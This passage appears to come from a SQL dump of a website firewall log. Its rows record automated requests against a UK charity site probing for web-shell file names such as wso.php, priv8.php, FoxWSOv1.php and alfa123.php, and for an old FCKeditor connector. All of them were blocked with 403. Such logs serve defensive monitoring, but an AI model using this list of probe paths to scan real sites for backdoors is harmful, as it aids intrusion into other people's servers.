(Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wT7APXGeI6aJU4lh1NMHtoZD',0,1674488137.7080,85,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lQ958iAxrN1T6t4D7zbkjFpy',0,1674488138.4978,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','37BqcuNZozHth2TUvmEka654',0,1674488139.2941,102,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6D3GIhuP1lAdWoZq7kcMHQ8j',0,1674488140.0864,83,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kpMiIL3vFxbK9E4edrlmnH0J',0,1674488140.8594,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kKxoTZmR1YzPO0LI7UtSEgQN',0,1674488141.6483,104,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','mzKDGY3sMXR89v5rcn4Iupjh',0,1674488142.4450,83,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','evL6CPrk0xBfGnFgbIydOoKS',0,1674488143.2086,117,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','uUMnoD12ak6SPYjtHJsxONXc',0,1674488144.0131,108,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pOTZEALQY3BNaI9cU0Gtdqly',0,1674488144.8225,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2tnLqexsrD4Vy065TZJHNE3P',0,1674488145.6135,121,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dDbptiPlzc81h3XE5v69GAnR',0,1674488146.4372,108,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','x2t9p5g1RPFwkTvDU4JKYfhL',0,1674488147.2598,86,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','HiPthj4fg13uFJnMOlQU9vRN',0,1674488148.0594,117,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ArocB7qD8gWvY1iQ3HNuI5kL',0,1674488148.8741,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','giVqrb1TJGXIZuSpRjxoHW8a',0,1674488149.6520,110,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Q0ZnO53uN7pRSj4LCblEmy2i',0,1674488150.4563,117,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7Qq3XpaftgVGSsnRTBW6yvLN',0,1674488151.2826,88,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qYu2iDHo4lG73UTha0CJL9EQ',0,1674488152.0593,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KjiW0gINJasDLqAcd3PBvy9Q',0,1674488152.8445,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1qb4Bc8903DIFdLoxamGjuPC',0,1674488153.6292,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nD2i5uxvC9074hHm1Nq8tRdL',0,1674488154.4099,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JtqkLG27hwXiTsE835bMRgQS',0,1674488155.2073,100,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5naE173CuWRxMG6bVopSJ4y0',0,1674488155.9936,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','x4U2yviSDaEQPw9f7uCFYmLp',0,1674488156.7742,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ju7dlF5tVn3Cs8OxD1YIyrLG',0,1674488157.5713,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','pjnNd15CX9r2aAOMIW0Ho4fG',0,1674488158.3559,112,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','82oABDqY9p51mzCO4sJvU0lM',0,1674488159.1762,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','BuUgTXQ1bO6WjnaVPZ3Gl0Yo',0,1674488159.9519,86,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','CqKHleOU9zEvDM1tIuPSnGyL',0,1674488160.7240,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KOtJazbsj3Fxwv1cAi0UHmeq',0,1674488161.4994,109,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FWhH5l8yNSOwJVBxa3rY1int',0,1674488162.2962,140,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tPm0xuCawWglyMNi3qIBR6Qz',0,1674488163.1241,108,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QTDHEoKUe5JfyN97zxGFvcZS',0,1674488163.9151,120,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','MlqLEXZrVA2ebDIJTKNCsvmk',0,1674488164.7388,96,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nQNRlBi8v7Cf4oeMtqUucbpH',0,1674488165.5232,113,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PHZbarMNFSQ5ugnyc9C20OEU',0,1674488166.3295,121,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GQKZMP5SYJO4ErAy6D8duTwl',0,1674488167.1422,83,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hK1ytlWHcD0VIukNpAJBZgsT',0,1674488167.9188,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6y3klzpdOfS2Hs0oT4ABvnRe',0,1674488168.7083,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7lXTrE3z6SC9mnGyakvcAbq2',0,1674488169.4953,129,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kTlV5shWYu3Uqry6JPDcSfdL',0,1674488170.3166,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','zDmZqOg2TvN5dyLPnasiC107',0,1674488171.1321,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vnR3SJ72HuKDMCX85yYgEpjt',0,1674488171.9200,110,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ME6WyXdSbsfartQPHUoe0qGl',0,1674488172.7201,113,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/7yn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7jXRgKn5Y1N3izyJ2luGkPao',0,1674488173.5293,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/haxor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','yjsn3LJHVCQtqebfKO52Eohl',0,1674488174.3089,84,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/13.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EHKVAfUbXx7Mp3SQo4J5e8yY',0,1674488175.0814,100,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/FoxWSOv1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','iNQnqDPy3ZoK8dxF4uv6Jec0',0,1674488175.8711,90,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YTFj9wPmy2zXJ4GvEgr1AnlC',0,1674488176.6772,111,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/bb.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','onKv9qRaej72ULb41FXJGTBm',0,1674488177.4890,98,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/lf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TSXc5G17gZlAQk0bxo4hqrdw',0,1674488178.2887,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/WSO.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8zIb3amYUlR5jBs9QgtVdfhp',0,1674488179.0760,114,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/hello.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9q1Cmb2tKiVvN4036YIgFXhA',0,1674488179.8838,91,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/if.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','J5gBNKcsdPhC1DjHeo2IUfSW',0,1674488180.6563,131,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/kk.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ycfKmel7rNuqbHUtpWDMx5oL',0,1674488181.5014,142,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mrjn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','j2pROPrZY3JEzdIU7FsHMhlc',0,1674488182.3449,95,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/kn.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','KtL2ny4MwYbmOTVvBuSzCE70',0,1674488183.1462,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/3301.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','UDIO3Ct5RfHmXTsciF4S6e1w',0,1674488183.9528,113,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/leaf.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9hQdeG34jZvn8z7JLg2BkcfR',0,1674488184.7552,97,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alex.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YlUDmayw4EdnxbAHzSsRfI2L',0,1674488185.5299,146,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/mailer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8GMt4pNXhboVHxCPLgj0fKkT',0,1674488186.3565,118,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/anone.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','1ETHg72fF4KtrYJ5ab9dkNOn',0,1674488187.1707,83,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-configer.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2r9etkJBHRcfEdVKxZOU0DAs',0,1674488187.9529,134,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-ad.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OdNJ4pov6hKY5Eb8DuXPx0VT',0,1674488188.7817,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/send.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Av2ly5RWJPxe7omfiILMbZzK',0,1674488189.5641,119,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/.wp-cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','B4ltgUfLXajiroG6mbWzT8vQ',0,1674488190.3987,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kEWhHoPRNajirdXFK2bT5s6z',0,1674488191.1903,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','paQlw8NIbTu9AvLVhC0fd4Fc',0,1674488191.9780,105,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ncuaC5gZesxrYKHEG1UtW74S',0,1674488192.7595,94,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','tPjT8bl3qXnVsDwWCgI0zxir',0,1674488193.5543,136,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','P39vRQjde4KLVu6JabkpmXNM',0,1674488194.3955,92,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','10CatYTr849NOuvFHk7XDEcz',0,1674488195.1975,106,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ftepxz9PJXMjYlmZT42k6n5F',0,1674488195.9961,93,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QLUucXJpOdNCqPMo0xTSzVha',0,1674488196.7917,125,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','6kyaUTeVBmKF0S8dNIzqpZnC',0,1674488197.6629,101,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.equalitywalk.org.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','W74TF9ZiI1tp0v6AokLOEHxr',0,1674488198.4599,93,'','GET',403,0,700,0,1,'',0),('108.167.157.195',1822924227,'','https://equalitywalk.org.uk/wp-admin/maint/atomlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-admin\\/maint\\/atomlib.php\"}','Tox5IS4EkzhnaP96HDWXpYrl',0,1674490684.7370,143,'','GET',403,0,700,0,1,'',0),('185.36.81.21',3106165013,'','https://equalitywalk.org.uk/sites/all/modules/fckeditor/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/75.0.3770.100 Safari\\/537.36\"}','Btg9JkClwdGhMPsDaVAZcexF',0,1674570441.3076,246,'','GET',403,0,700,0,1,'',0),('167.99.15.144',2808287120,'','https://www.equalitywalk.org.uk/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 